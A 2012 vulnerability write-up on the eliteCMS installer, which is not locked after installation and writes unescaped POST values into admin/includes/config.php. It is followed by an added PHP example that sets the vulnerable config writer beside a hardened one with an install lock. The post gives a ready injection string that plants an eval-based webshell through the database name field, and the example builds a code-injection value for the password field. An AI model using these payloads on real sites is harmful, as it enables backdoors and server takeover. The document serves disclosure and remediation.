eliteCMS install file not verified + one-liner (webshell) write vulnerability

Posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation finishes, so an attacker can revisit the installer URL and run the installation again.

Another vulnerability is that the installer can write a one-liner (webshell) directly into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
... omitted ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // session values are interpolated into PHP source with no escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // the generated source is written straight to the config file
    $writer = fopen($file, 'w');
...

Looking further at the code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-liner backdoor will be written into /admin/includes/config.php.
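An added example, not part of the original post and not eliteCMS's own code: the installer's config writer reduced to a function, next to a hardened version and an install lock, so the two issues described in the post can be compared side by side. The `$db` array stands in for the post's `$_SESSION` values; the key list, the `install.lock` file name and the constructed payload are assumptions made for this illustration.

```php
<?php
// Added example (not eliteCMS code): the installer's config writer reduced to
// a function, beside a hardened version and an install lock. The $db array
// stands in for the post's $_SESSION values; the key list, the lock file name
// and the constructed payload are assumptions for illustration.

const CONFIG_KEYS = ['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'];

// Vulnerable generator, mirroring the post: each value is interpolated into
// PHP source inside a double-quoted literal with no escaping, so a value that
// closes the quote ends the string and the rest of the value becomes code.
function build_config_vulnerable(array $db): string
{
    $write = "<?php\n";
    foreach (CONFIG_KEYS as $key) {
        $write .= "define(\"$key\", \"{$db[$key]}\");\n";
    }
    $write .= "?>\n";
    return $write;
}

// Hardened generator: DB_SERVER and DB_NAME are held to a conservative
// character set, and every value is emitted through var_export(), which
// produces a correctly escaped single-quoted PHP literal. Quotes, backslashes
// and "?>" inside a value therefore stay inside the string.
function build_config_safe(array $db): string
{
    if (!preg_match('/^[A-Za-z0-9_.\-]+(:[0-9]+)?$/', (string) $db['DB_SERVER'])) {
        throw new InvalidArgumentException('DB_SERVER contains unexpected characters');
    }
    if (!preg_match('/^[A-Za-z0-9_]+$/', (string) $db['DB_NAME'])) {
        throw new InvalidArgumentException('DB_NAME contains unexpected characters');
    }
    $write = "<?php\n";
    foreach (CONFIG_KEYS as $key) {
        $write .= sprintf("define('%s', %s);\n", $key, var_export((string) $db[$key], true));
    }
    return $write;
}

// Install lock: install.php should call this before dispatching any step and
// refuse to run if the marker exists, so revisiting the installer cannot
// rewrite config.php. The file name is an assumption.
function installer_is_locked(string $lockFile = __DIR__ . '/install.lock'): bool
{
    return file_exists($lockFile);
}

// Written once the final step has completed successfully.
function write_install_lock(string $lockFile = __DIR__ . '/install.lock'): void
{
    file_put_contents($lockFile, 'installed ' . date('c') . "\n", LOCK_EX);
}

// Constructed payload: a value that closes the quoted literal, appends a
// statement and comments out the rest of the generated line. It is placed in
// DB_PASS, a field that legitimately may contain any character.
$payload = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => 'elitecms',
    'DB_USER'   => 'elite',
    'DB_PASS'   => '");echo "injected";//',
];

echo build_config_vulnerable($payload);   // the DB_PASS line is now live PHP
echo build_config_safe($payload);         // the same value is a harmless literal

// The same payload in DB_NAME is rejected before anything is written.
try {
    build_config_safe(['DB_NAME' => '");echo "injected";//'] + $payload);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

With the constructed DB_PASS value, `build_config_vulnerable()` emits the line `define("DB_PASS", "");echo "injected";//");`, which PHP runs as soon as config.php is included, exactly the breakout the post relies on. `build_config_safe()` emits `define('DB_PASS', '");echo "injected";//');`, a plain string literal, and throws when the same value arrives in DB_NAME. The lock check belongs at the very top of install.php before any `step` is dispatched, and `write_install_lock()` should be called only after step 4 has finished writing the config; with both in place, re-running the installer and smuggling code through the generated file are closed off independently.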